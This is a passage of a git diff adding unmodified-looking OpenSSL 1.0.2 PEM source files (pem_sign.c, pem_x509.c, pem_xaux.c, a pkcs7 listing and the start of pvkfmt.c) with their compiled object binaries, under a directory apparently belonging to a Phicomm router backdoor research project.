zot3G<^e`?P?qG3%P5N)Y$kWqPWvb48(%E@GWM78cTCB5A?9?MbG*^HGU8BLsQR*6-
z*hgWFF^kKlxqB3|%`r_aq_u^dI;`e(h&hx}Hcyr2=2t6x8Jd0ubJUVGMOc;P)-5vy
zIE+=ut0&<5%XgY5I6eU^nA+xnif>{kI2&mPHuMHuoN7!?wwKgTLS3mYyI!bWnTw^$
zlw;eG_dx(X4NjE3Pwk4+*#-VgWA6`StOTx?s;4a|Gd2!2OjA{`l7Dg&8UYLnV2$+>
z>aJ2b$D+gq)!FwHsvROiok>9#!Sbs#)vp!<*M{*7u;ZoRjb$$MarEieWZ<*~#!fv#
z{EEwVCOKN|XMadL(_?lU2{YW~jS$jUUw@ycBDASDYV~?*yvx0nOMNSPx$4`wtkPRq
zb-Rrr6$0f&N}<hx*0?4_3JA#{b3;QZvpeG2-a=e`rLG(2%`M&wlfbj#Cg<5foK%BS
z`g}p7QvRH~PVuA*14_lSbNou>(?#`4b#iW_a>!NilQQU9tz=xy&}#_#m1;22lnQXE
zQ_Aa<(mJIWb{WF;IkA7np2r4*=iEVzO)+*O#`a_ERmz+53l1vPT8>ae2lr7Y)+^I_
z@>o32I*bLLPZw!+o;~g-UAfb8qU7!{bRju2mFuZH=gE(2ELM58mz(d(Y=)Yf?@}&4
z_j1VXVKH-vo8XB(Tjp^UtKf2R6F3I4<Z93tNb}+~0BjL7tfy?L0+5TZ%)?jb;T!Vs
zjyxReDA%~p<l(R8;Ro{Y!8{ymF4wr9=ixsB$MqEJ$m<^1xjgoBpx|=FzdjGI0FLor
zf)^ZxzYEaco5y}t9=<UT@5sY<<l#g*vAlYHC20;c8Le=F1*4r7F&g!?b((IhZD?o>
zv>9z$ogOeqORHuiI=7pozGXvm+ghVL+|?C}kU&d|(bH=gW;`B?lfb%WBM^<m+D#q_
z)h54D-?rZ9#K@@oJGYn#Yx;40u$cy0W}8fBG83*2#@Z@|-W)egvbH&}rnOZ!B3))U
znlOoBB&={`s}bqgYHSX7c1_PI)YBfeOlfQhK(6s^J=Saj**iciOG9Tg+$AQ54jdR}
zpJ3oJW7FEXB|4)y^XF;y_HYMj&I0qYAoxRvg5QAo(EgsXC4~?K%Lh*n!S^BrL3{j_
z75p89AjnIg34RzM2y(1n!9PX_f*j8l!M{fcf_woq!7m^LL4FN1!52Zjp&-X^m*6WU
zF3)SV#IKd?Es0+z@ubABm-x#PFPHeF#BY%J3g<n<Ja3eEtHkm9D)QeYaXJ1uiOcI;
z?0i}<zC7QB4o5e6AMcRt<$YWuaXJ3u62~)N<e8SZod14_-z?dWNZcdwZzL}7%V~)(
zmh8_<e2K&haRETEllO6<#O3w$pfL!pkF&H~@8{PUF3#y=SzMg2#GBaGZG|^MZ^iAt
zL)^v9uCUiK`z+#xb0JK;n-U4)jmJ<ybD!5oypdRUw;2VKXv{Lb@N2e|A1;o*CEDxl
ziN|`(xU~&jF`(IDY>tP!O(&uM*?GVpOE>$=UkeQ7ZfE^$&9)Wy*ketjNi8&42CsB9
zXTPoj6~_^OD!3OYw?RYhm?7d4%Nkd3w3X#9P%!3y_4k1<##{zX7BN2NEsGdm^tJF1
z?<-{^xZm#Ne`gjKexeV;b8#=5?*Etb$Nwb!E0k*(;~a4OJ*Y?`)?c6};0DLf_CMzM
zmu4lG?cW8yXj%(RmO(s>K&agjTt_^IgumGTTw|llSI#dgbv73NTQNqqKgP`7dqBj4
b4?teX%0Elx-=JLn{38ecJ9w0tOSb<%F5ikX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.c
new file mode 100644
index 0000000..b5e5c29
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.c
@@ -0,0 +1,101 @@
+/* crypto/pem/pem_sign.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+void PEM_SignInit(EVP_MD_CTX *ctx, EVP_MD *type)
+{
+    EVP_DigestInit_ex(ctx, type, NULL);
+}
+
+void PEM_SignUpdate(EVP_MD_CTX *ctx, unsigned char *data, unsigned int count)
+{
+    EVP_DigestUpdate(ctx, data, count);
+}
+
+int PEM_SignFinal(EVP_MD_CTX *ctx, unsigned char *sigret,
+                  unsigned int *siglen, EVP_PKEY *pkey)
+{
+    unsigned char *m;
+    int i, ret = 0;
+    unsigned int m_len;
+
+    m = (unsigned char *)OPENSSL_malloc(EVP_PKEY_size(pkey) + 2);
+    if (m == NULL) {
+        PEMerr(PEM_F_PEM_SIGNFINAL, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (EVP_SignFinal(ctx, m, &m_len, pkey) <= 0)
+        goto err;
+
+    i = EVP_EncodeBlock(sigret, m, m_len);
+    *siglen = i;
+    ret = 1;
+ err:
+    /* ctx has been zeroed by EVP_SignFinal() */
+    if (m != NULL)
+        OPENSSL_free(m);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_sign.o
new file mode 100644
index 0000000000000000000000000000000000000000..62871dde86cc76f50660e9aa2941d81d4eaefb3d
GIT binary patch
literal 2648
zcmbuAU1$_n6oBvUCK@r0>t78hVIES6REHh46pNId&CX_mTeBp)(qQa#vY8}H_OG+E
z5G`0~P#Dq_-+c4g2j6@XTNhfTeQME{_N@=4w6s)9DTN~1bMD-;nM`J1?14My-0z-q
z?*E;S^?WWKi!qWIdxve*h%)y5whcSY%`}tPF80^%;eXY~zal}?+c35B6W$BM`&KJW
zcz<if(zM|{F;;(<=Z&?#*GIwM@UkOAYRB;MBLlx+f_p`z>u;jHz7prmSc6vMTBkj%
zs~z>5dm6NT(S*-~9q`fBpSag=r;YXE$bQ3nl=uEIyoVe@<F(F}gKNCukG%I(yN@&D
zZC=9go{A1&6!XSOe@t$_4_CjEv)+#vE^4#dMeY4Bn|94?RTk??nX&P)vA5;X(p<al
zw&l~xNhNh$eXGr@>Xj2IC3WhkkD)Kd`k*AC^g|gxS7LF-I>-`GQ1<(Z#V${=*h(^X
zXmI<$4HzcI92RXmg+`VNu`^K53ici9oRs`5Zb(Dx30;yu?bD>u>;0OPTHQ7-72>z0
zR8|_*Bsn7uWu#<A8W5pd6s}Ys`}5_N1^|i36M~#(wK*!mS79^5T7s`i6yLrTa{uVz
zCK#TD%`(WVxawOa!2*X_H17euH!v?+^I_n)?qN9vAd2UJV;+hpUFzY#ApBngjl%a3
zv<oFF|0g~8jUN0~4}PZyzu$v@-Gj5h)ll+dDOS+mHK*aKOw=nbGsp9j87*&4=5o_|
z(JX42ylyi6e8J3C7VVacPNu!m4JtL~E!Pe>2tY}5mAX~s&4si23|z^}HXECoDHJEo
znpLef%1ob{GMjBk>NpLDd*Wa=;`DmCF>hzUb(ta;9NT85*>bJ&vRPhQHW#c)6{gF@
z5E}0+o{{G-eZi*+1@1FHeZ*%u_3!;&u!-Zop<teUP>A0|2!b5n0^)ZOf*?Nth4|+P
zL6GB_A^sR42=aqah|^6%zAM0SY$(WgLm__|Y!sXq77{$~D8%Vp)A|snbIg?1rJ8Ha
zfp#5VFOlWgRZDU06_+Wn-4;{kS}mqH4XmKMs;EpUH)=Jz4lebEYb)?{9_Je*>WlTZ
z(sUY4+i@>JC?>R*%mv4)+5R~H?^lKd_y&ewiZn2kpMBN+qHj<RK?T<~9fV-Z;z@cY
zIIbhc(#tj^_z}UwFY1wSN5VghkBOYG8n24}Pl)`asDIjj;?zIsG&G={A_t*W;qXR?
zQyl3DXeT@9IvWKed}n~+*$<v!%=3YWm$4EMT7N<xf`P8#_^TrRDme-rj>iWiYX6hs
zK+(Oyb;Q3H#nb*r_078y14;`$2oQ6G<1uG=?=e1&g97=%SKY6eR=19CT~z#gV*DR<
JJ$)k_{~yyRNWlOA

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.c
new file mode 100644
index 0000000..3c20ff2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.c
@@ -0,0 +1,68 @@
+/* pem_x509.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
+#include <openssl/pem.h>
+
+IMPLEMENT_PEM_rw(X509, X509, PEM_STRING_X509, X509)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_x509.o
new file mode 100644
index 0000000000000000000000000000000000000000..17cad6877181224d004cff5506c44afa67afe09f
GIT binary patch
literal 2584
zcmbtVOKTHR6h3LHt=Ps`6^a#&2ofJ1lGq{@lr%Bv1f!KU1qESDnyF1~9;Q=l6;$Xd
z_`qd%;?{+0H$p)dcIVQcpyH+oE{agkH*;@#JDG})12^ZK?|kRGnS1Ztd6>$k+k8Hf
z=A#R=nMssrdFN&vx5GFEsGGj;IlP`}eAFB3`s4G!GmTZfv8F#AMDhhce@M}nz6BxE
zSW87$XGqAUqANmchGyt9^z^0o;dc=IyN+aPESE`VlEb+a(MU3RE)<?9%vY@W(2#aU
zi}Xj&&f979K`f$022MCICWN)~2=ds$W8}&NwGpiV^Yei1cO3cdjgfC5=<Dn1=zPu#
ziJn8Ec1(C+5f=u|MS;cO^+4~XKxjM=P6Q&EKqu<O-_%8^#bGboX>FsWz<}R#r-93-
z+S=u}S79rL%x|xX7v9kd+WgLK@Ler<myKZ6Tg^|(p%mr4?0b~wl4}l+b$8nk173Jy
z8$8E2^i^GG7PjHn1V0TDo4vQ}mw0&1`(zvZ1>=}^fjvy>yyn<ThiYcoSQv~9X_KU7
zlM%X_x@^?Ve9<VBs>U@gkTH@SO$=v^(R6w|l{0d~iEPTCVyxtp(J(xICED!Tl(5^k
z)a}~cddV_3^-Hm$OQ}gv=v%dH2A;1QKWry?ApW`G*g=47{QeP6i^L-U+1z~lPGa26
zzhSc-eh<e|XG-91epTRj=l3c6X9CB(s?M^&-8wG?4xIx$<h(}|JfPqS1;;*1en{ZZ
z$B;H40*T9Ws=IJ`9;aQnJYS^EEtai(fxT6C{Irbf=4@WG%ms_IV&2M=R+yV3tzJa}
zdQ^*&Hd!r~%?eX0Rm;@)%Iu%B@{_kkeycLC)#}xnS+^Fs6@uopF;&l(P5C7M=R@3%
zyU%??#2JIVa$NHlT-EwG!5+m`kmF^5Y$4IGn`4CXM(ah9?KltMek6*0Rbn-C&wrYW
z(EQi_DEC5B-V+?!Cg*qVRf#%WWb%K+MJ(Sd)L=gxN2i3BPWDNk;ew1M2mYuR=)t|t
z7``6r+2)kOqCbR0F}eN{y2Ame?tWeLKaxb@-TkwSd+q-l@hQ3~`mq1Fhh)Fpf3LaG
t@<GfW6n_l+01bCPG~Ij85PcHhTO^7J*(QSTpjUsdcp>gLnNHyD{{>RFHrD_E

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.c
new file mode 100644
index 0000000..c523430
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.c
@@ -0,0 +1,70 @@
+/* pem_xaux.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
+#include <openssl/pem.h>
+
+IMPLEMENT_PEM_rw(X509_AUX, X509, PEM_STRING_X509_TRUSTED, X509_AUX)
+IMPLEMENT_PEM_rw(X509_CERT_PAIR, X509_CERT_PAIR, PEM_STRING_X509_PAIR,
+                 X509_CERT_PAIR)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_xaux.o
new file mode 100644
index 0000000000000000000000000000000000000000..c7f0b2e98f8e2f3e83a6c1cbfd6d07c032be2004
GIT binary patch
literal 3608
zcmdUxO>7%Q6vxMPKhl!ADIgRm0s{htkFM;{3W`MKkFH~@rfCyLN+qO~6K_dE9S3_Y
zT#!Jh9Iz0G1BV{Ca6m#82X2&GBzlPesb|heq*4!!kT_IG<^6Zx+Z~VB6(1)?8o!y}
z{NI0OcXns}zFjTtN+gt&ggU9Bo=~N(9EjREznN1hbx{3&=&?JM{*7|~PWj_k!7Kf(
za(}1%$#HaU;^%Kl%9n3Vz^1=rXSdcA+u7Mo_F7YGY8!s#%h#uVfayQa_<yXlHn%We
zvrnaq_FSz}suc4zTWRg|*?eVAshMK&mGsoYQg_|!rcYQeTA8ESm%4s8``&cM${c$(
zz_@2>H`NKMd#KKwSx~!_+5}5dMR_m?D)G*oO7tcYN5=P!eMS!gavtTer#OOT3<k|9
zX48n})a2<@dOkH(NM$OiF^o6vF%HiUd0e08ioxLX4YN`6{B)0T9vTXG=69=|yF&v6
zlCf_DxZJ(LtfYUp2N`-v|L(`}eZ$b#kB#8_hxoWpu)Blhu;1Mi?yo+YRD1QV-+qXG
z@7JzZ_TmNN*dwzP2*mN(5xh<u{^BdKGeZ9X>q`_-{5_|L=OS+2uSW1|#4&G=B8vF@
zNbNYEUx-706=Eu~&OfLfr{7Nx5cEI$>PY_t^V`g2-jl@Re9p1{Ns1_<R~v5A>D9YE
zYgt*<Vg^51b=H2(X}k4?v$WcB7LR96IQfM|<;+xP3;C)uTPn@lHK&#@RBcB!rdJ~g
z67%zCvSD^)71|7F{PDNjtDZYJ*Xnd5#x)dbX~Vw0Dw;UF2Ap+{f5?Svj!<~XzTY4Z
zrwx`A4Th_X5PSl?VHDi=gF#TwQA|<&^KMWcVNU0#!doaj!`#&S-$WWS^{;FC2Q;4x
z%uRiZInHdH)iUp=%rUR-Bj={+^Cj!ygLhqgzGDubNsV7;4xa-W$NPa|>VFHcf4#bX
zFF()FAE7GqPB1t9A7*Y|@5>{63L|_@Yd-q*KF;fe{~>KX1&!nElyz=tT-V>yxUNq#
z$917fImQj)a;}sOF6Z5f!R7q=$lzDG|AoQjJo?t)avt3<xSTu6>Rf7i^(Bg4JBTaN
zYP%Qfmgn|7Wi{$vU0F+=j<VV<bRf@KS!FG^noW0|B<n5DwdgO$(T-PNev|uetaq)A
zc5B0JdzUB`hVF`Up<QpfyrBOW(v**_H@|Q>Vkk9!E`na5l{O-tQ9K(ts(P8^Pj!wr
z^*$Pem3*o3?w~wF6+DTKRz5f8l_3-3dkfEho1djzc!u8(YNN>fPY2!bSLT<PqY<>_
zTod8<EO=f3N6C{|AuerQ`fD7F(Vi!UTdlu4@Y&}4G&)+5`!DD%YCvk{k1^O5AxAU+
zBJsHWU*x}Do1BOJ2a<f*|G2r4a+~MB#&Mh&s+kW@bMFbMulX<DnsFbEuEJRqmp_R^
NnaaCC2!GA|zW~o$C?Ws=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pkcs7.lis b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pkcs7.lis
new file mode 100644
index 0000000..be90c5d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pkcs7.lis
@@ -0,0 +1,22 @@
+21     0:d=0 hl=2 l=  0 cons: univ: SEQUENCE          
+ 00     2:d=0 hl=2 l=  9 prim: univ: OBJECT_IDENTIFIER :pkcs-7-signedData
+ 21    13:d=0 hl=2 l=  0 cons: cont: 00			# explicit tag
+  21    15:d=0 hl=2 l=  0 cons: univ: SEQUENCE          
+   00    17:d=0 hl=2 l=  1 prim: univ: INTEGER          # version 
+   20    20:d=0 hl=2 l=  0 cons: univ: SET               
+   21    22:d=0 hl=2 l=  0 cons: univ: SEQUENCE          
+    00    24:d=0 hl=2 l=  9 prim: univ: OBJECT_IDENTIFIER :pkcs-7-data
+    00    35:d=0 hl=2 l=  0 prim: univ: EOC               
+   21    37:d=0 hl=2 l=  0 cons: cont: 00               # cert tag
+    20    39:d=0 hl=4 l=545 cons: univ: SEQUENCE          
+    20   588:d=0 hl=4 l=524 cons: univ: SEQUENCE          
+    00  1116:d=0 hl=2 l=  0 prim: univ: EOC               
+   21  1118:d=0 hl=2 l=  0 cons: cont: 01		# crl tag
+    20  1120:d=0 hl=4 l=653 cons: univ: SEQUENCE          
+    20  1777:d=0 hl=4 l=285 cons: univ: SEQUENCE          
+    00  2066:d=0 hl=2 l=  0 prim: univ: EOC               
+   21  2068:d=0 hl=2 l=  0 cons: univ: SET              # signers 
+    00  2070:d=0 hl=2 l=  0 prim: univ: EOC               
+  00  2072:d=0 hl=2 l=  0 prim: univ: EOC               
+ 00  2074:d=0 hl=2 l=  0 prim: univ: EOC               
+00  2076:d=0 hl=2 l=  0 prim: univ: EOC               
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.c
new file mode 100644
index 0000000..ee4b6a8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pvkfmt.c
@@ -0,0 +1,883 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Support for PVK format keys and related structures (such a PUBLICKEYBLOB
+ * and PRIVATEKEYBLOB).
+ */
+
+#include "cryptlib.h"
+#include <openssl/pem.h>
+#include <openssl/rand.h>
+#include <openssl/bn.h>
+#if !defined(OPENSSL_NO_RSA) && !defined(OPENSSL_NO_DSA)
+# include <openssl/dsa.h>
+# include <openssl/rsa.h>
+
+/*
+ * Utility function: read a DWORD (4 byte unsigned integer) in little endian
+ * format
+ */
+
+static unsigned int read_ledword(const unsigned char **in)
+{
+    const unsigned char *p = *in;
+    unsigned int ret;
+    ret = *p++;
+    ret |= (*p++ << 8);
+    ret |= (*p++ << 16);
+    ret |= (*p++ << 24);
+    *in = p;
+    return ret;
+}
+
+/*
+ * Read a BIGNUM in little endian format. The docs say that this should take
+ * up bitlen/8 bytes.
+ */
+
+static int read_lebn(const unsigned char **in, unsigned int nbyte, BIGNUM **r)
+{
+    const unsigned char *p;
+    unsigned char *tmpbuf, *q;
+    unsigned int i;
+    p = *in + nbyte - 1;
+    tmpbuf = OPENSSL_malloc(nbyte);
+    if (!tmpbuf)
+        return 0;
+    q = tmpbuf;
